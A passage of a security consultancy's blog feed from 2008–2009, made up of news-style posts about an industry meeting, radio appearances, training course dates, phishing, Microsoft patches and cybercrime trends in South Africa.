mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;The Information Security Group of Africa convened at the Standard Bank building on Grayston Street yesterday to share and learn about pertinent industry issues.&lt;br /&gt;&lt;br /&gt;The meeting kicked off with an overview of an exciting project entitled “The Pubcast”.  This initiative is meant to provide a platform to bring information security professionals together to discuss information security and to bridge the gap between infosec and social networking. The most recent “Pubcast” podcast was a live interview with Karel Rode and Craig Rosewarne – Acting Chairman and Chairman of the ISG, which was recorded by ITWeb at the meeting yesterday.&lt;br /&gt;&lt;br /&gt;More information can be found at &lt;a href="http://www.discussit.co.za"&gt;www.discussit.co.za&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Gareth Watt spoke about the new EMV (Chip &amp;amp; Pin) cards that are being issued locally. Watt discussed the evolution from magstripe that originated in the 1960s, to the EMV cards in use today.  Although these new cards have many benefits, he said, it is still possible for them to be skimmed.&lt;br /&gt;&lt;br /&gt;Charles Dick was there too and spoke about the Post Office’s Trust Centre. “SAPO does not see itself as a digital certificate seller,” he said. “Rather an organisation that creates a PKI environment for products and services.”&lt;br /&gt;&lt;br /&gt;The trust centre will be launched in approximately 8 weeks time.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1259920139444328248?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1259920139444328248/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1259920139444328248' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1259920139444328248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1259920139444328248'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/02/isg-meeting-6-feb-2009.html' title='ISG meeting - 5 Feb 2009'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6460850124883093267</id><published>2009-01-30T15:16:00.002+02:00</published><updated>2009-01-30T15:20:43.173+02:00</updated><title type='text'>Catch Telspace Systems on Classic fM TONIGHT</title><content type='html'>Catch Dino on Reuben Goldberg's ''&lt;a href="http://www.classicfm.co.za/talk/the-internet-economy/show-detail"&gt;The Internet Economy&lt;/a&gt;' tonight at 7pm where he will discuss security trends for 2009 as well as social networking threats.&lt;br /&gt;&lt;br /&gt;This is the second time Dino has been asked to be on Classic fM and we hope it will become a regular thing.&lt;br /&gt;&lt;br /&gt;Have an awesome weekend, guys!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6460850124883093267?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6460850124883093267/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6460850124883093267' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6460850124883093267'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6460850124883093267'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/01/catch-telspace-systems-on-classic-fm.html' title='Catch Telspace Systems on Classic fM TONIGHT'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-4965753015338323392</id><published>2009-01-14T10:53:00.003+02:00</published><updated>2009-01-14T11:07:50.497+02:00</updated><title type='text'>Telspace Systems training dates for 2009</title><content type='html'>Hey security peeps!&lt;br /&gt;&lt;br /&gt;If any of you are interested in expanding your already vast intellectual scope, you can sign up to one of our training courses this year. Whether you can use it in your business, or simply want something to brag to your pals about, have a look at our dates and let me know if you would like to learn some practical, hands-on hacking lore.&lt;br /&gt;&lt;br /&gt;Bluetooth &amp;amp; Wireless Hacking 101 (Jhb) dates:&lt;br /&gt;Feb 25 &amp;amp; 26&lt;br /&gt;June 24 &amp;amp; 25&lt;br /&gt;Sep 16 &amp;amp; 17&lt;br /&gt;&lt;br /&gt;Web Application Hacking 101 (Jhb) dates:&lt;br /&gt;Mar 11 &amp;amp; 12&lt;br /&gt;July 22 &amp;amp; 23&lt;br /&gt;Oct 14 &amp;amp; 15&lt;br /&gt;&lt;br /&gt;If this sounds like something you would be interested in, you can email me at ilva@telspace.co.za. It's gonna rock!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-4965753015338323392?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/4965753015338323392/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=4965753015338323392' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4965753015338323392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4965753015338323392'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/01/telspace-systems-training-dates-for.html' title='Telspace Systems training dates for 2009'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5955897460850773172</id><published>2009-01-12T14:32:00.001+02:00</published><updated>2009-01-13T15:59:29.929+02:00</updated><title type='text'>Happy New Year – but watch your back</title><content type='html'>Happy New Year all! Hope everyone had a well-rested holiday, and not too upset at the notion of another year of full-scale grind.&lt;br /&gt;&lt;br /&gt;Hackers had a field day while the rest of us rested - last week saw Twitter accounts, specifically those belonging to celebrities, being &lt;a href="http://www.techcrunch.com/2009/01/05/either-fox-news-had-their-twitter-account-hacked-or-bill-oreilly-is-gay-or-both/"&gt;compromised by a hacker&lt;/a&gt;. This happened after the weekend’s spate of phishing scams that tried to harvest login and password details from users.&lt;br /&gt;&lt;br /&gt;Britney Spears had a certain part of her anatomy insulted, while Barack Obama, Facebook’s Twitter account and Fox News’ also got compromised. This was the first time that Twitter was assaulted, and the fact that it was not only compromised by a hacker, but our fiendish phishers as well, shows that it has officially come under the radar.&lt;br /&gt;&lt;br /&gt;Furthermore, this year saw Nokia &lt;a href="http://www.milw0rm.com/exploits/7632"&gt;rendered speechless&lt;/a&gt; due to an obscure SMS bug that halted all incoming SMSes arriving after a specially formulated and very malicious text message. Many Nokia users simply felt they had been forgotten over the festive season…&lt;br /&gt;&lt;br /&gt;A &lt;a href="http://www.theregister.co.uk/2009/01/08/us_data_breach_survey/"&gt;recent study&lt;/a&gt; conducted by the Identity Theft Resource Center (ITRC) showed that 35 million data records were exposed last year in the US, in 656 incidents, which is a 47% increase from 2007.&lt;br /&gt;&lt;br /&gt;The increase in hacker activity and data breaches remains a growing concern all over the world. Those of your who subjected yourselves to the news in the December, The Saturday Star and &lt;a href="http://www.iol.co.za/index.php?set_id=1&amp;amp;click_id=15&amp;amp;art_id=vn20081213083840131C265586"&gt;IOL Online&lt;/a&gt; both ran stories about the local government’s loss to cybercrime – as much as R400 million was reported as stolen as a a result of keyloggers and other dubious means.&lt;br /&gt;&lt;br /&gt;This year, make it your priority to be as secure as you can be. Cliché or no, the proof is in the numbers.&lt;br /&gt;&lt;br /&gt;Have a good one.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5955897460850773172?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5955897460850773172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5955897460850773172' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5955897460850773172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5955897460850773172'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/01/happy-new-year-but-watch-your-back.html' title='Happy New Year – but watch your back'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-955140430457496342</id><published>2008-12-23T09:21:00.002+02:00</published><updated>2008-12-23T09:24:10.553+02:00</updated><title type='text'>Seasons Greetings</title><content type='html'>Everyone at Telspace Systems would like to wish you and your families a very happy and peaceful festive season.&lt;br /&gt;&lt;br /&gt;Looking back on 2008, Telspace Systems had a very successful and bumper year. Early in the year, Charlie and I jet packed to Hack in the Box in Dubai where we hosted an intensive 2-day training session on Bluetooth and Wireless Hacking. During the same trip, I presented ‘Hacking the Bluetooth Stack for Fun, Fame and Mayhem’ which went off without a hitch.&lt;br /&gt;&lt;br /&gt;Telspace Systems was a big role-player in this year’s local ITWeb Security Summit – not only did we present on “Hacking Wireless Modems” and break the story to the press, but we were involved in Johnny Long’s Hackers for Charity initiative. By Day 2 of this prestigious conference, Telspace Systems had convinced most of the delegates to do their part for the underprivileged. For those of you that are planning to attend this conference in 2009, get ready to witness a similar initiative ;)&lt;br /&gt;&lt;br /&gt;Nearer to the end of the year, Charlie and I again set off overseas – this time to SecTor in Canada (Toronto). Again teaching delegates the art of hacking wireless and Bluetooth, we finished off the conference with a presentation on hacking internal proxies. &lt;br /&gt;&lt;br /&gt;Finally, we have just learned that we have been chosen as a Technology Top 100 qualifier for 2009, making it the third year in a row we have been selected for this honour. 2009 holds many new training courses and great new services for our clients and we look forward to presenting these to you.&lt;br /&gt;&lt;br /&gt;It has been an absolute pleasure working with you this year – without your continued support many of our achievements would not be possible.&lt;br /&gt;&lt;br /&gt;Have a safe and wonderful New Year’s.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-955140430457496342?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/955140430457496342/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=955140430457496342' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/955140430457496342'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/955140430457496342'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/12/seasons-greetings.html' title='Seasons Greetings'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1373799324653262142</id><published>2008-12-17T10:41:00.002+02:00</published><updated>2008-12-17T10:59:25.434+02:00</updated><title type='text'>Dino hits the airwaves</title><content type='html'>Following his successful interview on Reuben Goldberg's &lt;a href="http://www.classicfm.co.za/talk/the-internet-economy"&gt;The Internet Economy&lt;/a&gt; on Classic fM in October, Dino was contacted to discuss this weekend's Saturday Star story &lt;a href="http://www.iol.co.za/index.php?set_id=1&amp;amp;click_id=13&amp;amp;art_id=vn20081213083840131C265586"&gt;Hacked!&lt;/a&gt; on &lt;a href="http://www.702.co.za/index.asp"&gt;702 Talk Radio&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;He was on air at 7:40 yesterday morning and spoke to &lt;a href="http://www.702.co.za/profiles.asp?id=8"&gt;David O'Sullivan&lt;/a&gt; about the security of open source and ethical hacking as a business.&lt;br /&gt;&lt;br /&gt;Dino will be interviewed on &lt;a href="http://www.classicfm.co.za/"&gt;Classic fM&lt;/a&gt; again in January, and I will make sure to post an announcement regarding dates and times as soon as we know what they are.&lt;br /&gt;&lt;br /&gt;Have an awesome almost-holiday week, and keep tuning in!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1373799324653262142?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1373799324653262142/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1373799324653262142' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1373799324653262142'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1373799324653262142'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/12/dino-hits-airwaves.html' title='Dino hits the airwaves'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7570956213961226073</id><published>2008-12-10T09:56:00.001+02:00</published><updated>2008-12-10T09:56:59.893+02:00</updated><title type='text'>Microsoft goes out with a bang</title><content type='html'>Microsoft’s last patch for the year is a biggie – it is addressing no less than 28 security vulnerabilities.&lt;br /&gt;&lt;br /&gt;Released yesterday, this patch solves the following issues:&lt;br /&gt;&lt;br /&gt;•    Six security holes in the ActiveX controls for Microsoft Visual Basic 6.0's Runtime Extended Files, all of which could allow remote code execution if a user visited a malicious website.&lt;br /&gt;•    Four memory-corruption issues in Internet Explorer&lt;br /&gt;•    Two other fixes addressed a total of 11 vulnerabilities in Microsoft Word and Excel&lt;br /&gt;•    Fixes for security issues in Microsoft's graphics library, Windows' search functionality, Windows Media Components and a vulnerability in Microsoft Office SharePoint Server.&lt;br /&gt;&lt;br /&gt;More info is available &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Make sure you download your updates!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7570956213961226073?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7570956213961226073/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7570956213961226073' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7570956213961226073'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7570956213961226073'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/12/microsoft-goes-out-with-bang.html' title='Microsoft goes out with a bang'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7349622303457492620</id><published>2008-12-01T11:21:00.003+02:00</published><updated>2008-12-01T11:37:44.734+02:00</updated><title type='text'>Recent Facebook mail notification = FAIL</title><content type='html'>Facebook users received an email notification last week asking that email notification settings which had been 'lost' be updated - followed by an embedded link. Was this a phishing scam, or was the email legit?&lt;br /&gt;&lt;br /&gt;Being in the industry, we know to stay away from any emails asking for personal details to be updated/confirmed/changed as it is more often than not slimy phishers looking to score. Banks even expressly state that they will never EVER under any circumstances ask for details to be updated via any email link, as they are most often targeted and the most lucrative for scammers.&lt;br /&gt;&lt;br /&gt;Facebook has certainly not gone under miscreants' radar, given the millions of users it has. Since the Facebook explosion, warnings of phishing scams and successful attenmpts have graced news sites everywhere - and offering users the knowledge they need to distinguish fake mails from real ones.&lt;br /&gt;&lt;br /&gt;So now - given the press and multitude of people they service, why would Facebook send all their users a mail that looks so suspiciously like a phishing one? Let's run it through a quick evaluation...&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XOVFBhYwjwI/STOwIvaq3HI/AAAAAAAAACc/roaF3zIhMic/s1600-h/inbox.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 152px;" src="http://2.bp.blogspot.com/_XOVFBhYwjwI/STOwIvaq3HI/AAAAAAAAACc/roaF3zIhMic/s400/inbox.gif" alt="" id="BLOGGER_PHOTO_ID_5274753252794752114" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Firstly, the language they use is quite phisher-esque - "Unfortunately, the settings that control which email notifications get sent to you were lost." Uhm... lost? This statement is broad, not backed up by any reasons as to why it happened, or what the details of the problem. Besides, there was no media coverage of the technological 'glitch' or issue that caused millions of setting to be simply 'lost'.. It scores 5 phishy points on its own.&lt;br /&gt;&lt;br /&gt;Secondly, the embedded link, which is a big no-no when it comes to getting personal details, scores another 5 points. We all know, that even though the link may look liike it points to the actual site, once clicked, it can easily redirect us to a spoofed site.&lt;br /&gt;&lt;br /&gt;Thirdly, the signature - 'The Facebook Team' - is so impersonal. If such a serious technological error did indeed occur, I think Facebook users deserve to have someone a bit higher up with an actual name and title to send them a mail. I mean, if Facebook can 'lose' my email notification settings in some unknown and mysterious way, what is to say that next time it will not be my personal details that disappear or my photos that get wiped out? Or, God forbid, I lose my friends! I'll give that one a score of 6 just for sheer cheekiness..&lt;br /&gt;&lt;br /&gt;Let's just say, even based on these three points alone, I would simply press delete and feel a small sense of one-upmanship by having foiled yet another potential Internet crime and never give it a second thought.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Obviously, they are trying to downplay the problem, which could be a large contributor to the way the email was written. But Facebook should know better. In my opinion, they should have bypassed the email route altogether and rather had an alert or pop-up within the application itself. If they had sent a mail to my Facebook inbox, I also would have regarded it with a lot more positive interest.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7349622303457492620?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7349622303457492620/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7349622303457492620' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7349622303457492620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7349622303457492620'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/12/recent-facebook-mail-notification-fail.html' title='Recent Facebook mail notification = FAIL'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_XOVFBhYwjwI/STOwIvaq3HI/AAAAAAAAACc/roaF3zIhMic/s72-c/inbox.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-4448930808742117397</id><published>2008-11-21T14:34:00.001+02:00</published><updated>2008-11-21T14:37:36.705+02:00</updated><title type='text'>‘Tis the season of folly</title><content type='html'>December holidays are approaching, and we all know what that means… increased hacker activity as our precious youths get bored and turn to mayhem and destruction. &lt;br /&gt;&lt;br /&gt;And to make matters worse, this time of year is always characterised by a manic rush for last-minute Christmas shopping – a lot of which is done online.&lt;br /&gt;&lt;br /&gt;Also, with many people being on leave, companies might not have IT staff available to monitor and pick up attack behaviour.&lt;br /&gt;&lt;br /&gt;This makes a killer combination for cybercrime instances – and we can expect to see a lot of people being duped, a lot of wesbites being defaced, and a many different malware popping up.&lt;br /&gt;&lt;br /&gt;This year’s ‘Black Monday’ for malware is predicted for next week (&lt;a href="http://www.theage.com.au/news/technology/security/black-monday-fear-for-malware-spike/2008/11/18/1226770427165.html"&gt;November 24&lt;/a&gt;) – a day that is expected to be the worst of the year for computer attacks. &lt;br /&gt;&lt;br /&gt;According to Adam Biviano, spokesman for Trend Micro, he expects to see a large increase in hackers using holiday-related tools such as electronic greeting cards as a front for attacks.&lt;br /&gt;&lt;br /&gt;"It's typical for the orchestrators of malware attacks to make use of public holidays, make use of special occasions, because it gives them an angle from which to attract people to click on their link [or] download their attachment," he says.&lt;br /&gt;&lt;br /&gt;Carlo Minassian, chief executive of Earthwave, says, “"It should be expected spamming and phishing will increase in the immediate future as we approach the upcoming Christmas period. Trends from past years indicate spamming and phishing spikes around this time."&lt;br /&gt;&lt;br /&gt;So have a good weekends, guys – Monday’s set to be a scorcher ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-4448930808742117397?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/4448930808742117397/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=4448930808742117397' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4448930808742117397'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4448930808742117397'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/11/tis-season-of-folly.html' title='‘Tis the season of folly'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5458030977213979934</id><published>2008-11-14T09:39:00.000+02:00</published><updated>2008-11-14T09:42:16.790+02:00</updated><title type='text'>South Africa prioritises cyber security</title><content type='html'>South Africa seems to be waking up nicely to the threat of cyber crime. Roy Padayachie, Deputy communications minister, spoke at a high-level security conference in Geneva recently about our commitment locally.&lt;br /&gt;&lt;br /&gt;“Clearly an effective cyber security framework is not merely a matter of government or law enforcement practices, but has to be addressed through prevention supported by society,” he said.&lt;br /&gt;&lt;br /&gt;He also made mention of a very important fact – that security should not be left to technology alone. “Therefore,” he stated, “priority must be given to cyber security planning and management throughout society.”&lt;br /&gt;&lt;br /&gt;According to his speech, South Africa intends to strengthen collaboration and partnerships at the national level through the establishment of a government-industry collaboration forum. &lt;br /&gt;&lt;br /&gt;He said “Cyber threats or attacks do not recognise borders or laws; therefore, governments, business and civil society globally should work together to protect and secure their national cyber space and critical infrastructure. Governments throughout the world are not able to deal with the emerging threat on their own.”&lt;br /&gt;&lt;br /&gt;This is great news for the country. As the 2010 World Cup draws eerily near, South Africa can expect to become a very lucrative target for cyber criminals, and it is best to have as many security measures in place as soon as possible. The many attacks populated near, during and after this year’s Olympics are a perfect example of how criminals take advantage of world events.&lt;br /&gt;&lt;br /&gt;More on Padayachi’s speech can be found on &lt;a href="http://www.itweb.co.za/sections/internet/2008/0811131040.asp?O=FPTOP&amp;S=Security&amp;A=SEC"&gt;ITWeb&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5458030977213979934?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5458030977213979934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5458030977213979934' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5458030977213979934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5458030977213979934'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/11/south-africa-prioritises-cyber-security.html' title='South Africa prioritises cyber security'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7455183782097143701</id><published>2008-10-30T10:51:00.010+02:00</published><updated>2008-10-30T11:15:44.875+02:00</updated><title type='text'>Cybercrime rises as markets fall</title><content type='html'>Recent data published by &lt;a href="http://www.pandasecurity.com/"&gt;Panda Security&lt;/a&gt; shows a direct correlation between the instability of the stock market and a dramatic rise in cyber crime.&lt;br /&gt;&lt;br /&gt;According to Jeremy Matthews, head of Panda Security’s sub-Saharan operations “When we began looking into the specific effects cyber-criminals had on the economy during times of duress we found a startling connection: the criminal economy is closely interrelated with the global economy.”&lt;br /&gt;&lt;br /&gt;He says that based on extensive research and analysis done by Panda of emerging malware patterns, they believe that criminal organisations are closely watching market performance and adapting as needed to ensure maximum profit.&lt;br /&gt;&lt;br /&gt;Some of the key findings include:&lt;br /&gt;•    On average, the US stock market experienced between a 3 to 7 percent decline from Sep 1 to Oct 9. However, activity on the “malware markets” was the opposite: it grew substantially as the stock markets declined.&lt;br /&gt;•    From Sep 5 to 16, the Dow Jones Industrial Average, NASDAQ, S&amp;amp;P 500 and Composite Index all dropped from the plus 0.0 percent range to approximately negative 3.0 percent or lower. In the same period the Spanish IBEX 35 index and the London FTSE 100 also suffered major losses. The same timeframe witnessed a significant surge in daily malware threats; for example from Sept. 8th to Sept 10th the volume of daily threats grew from 10 150 to well over 24 000.&lt;br /&gt;•    From Sep 14 to 16, stock markets dropped from -0.5 to -5.5 percent while daily threats grew 50 percent each day, from 8 276 on the 14 to over 31 404 on the 16th.&lt;br /&gt;&lt;br /&gt;Panda Security has provided the following diagrams to better illustrate this correlation (please click on images for a larger version).&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XOVFBhYwjwI/SQl5BrOwd-I/AAAAAAAAABs/iiHGL5kGRHQ/s1600-h/market2.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 180px;" src="http://2.bp.blogspot.com/_XOVFBhYwjwI/SQl5BrOwd-I/AAAAAAAAABs/iiHGL5kGRHQ/s320/market2.JPG" alt="" id="BLOGGER_PHOTO_ID_5262870709250586594" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal  {mso-style-parent:"";  margin:0cm;  margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:12.0pt;  font-family:"Times New Roman";  mso-fareast-font-family:"Times New Roman";  mso-ansi-language:ES;  layout-grid-mode:line;} @page Section1  {size:612.0pt 792.0pt;  margin:72.0pt 90.0pt 72.0pt 90.0pt;  mso-header-margin:36.0pt;  mso-footer-margin:36.0pt;  mso-paper-source:0;} div.Section1  {page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 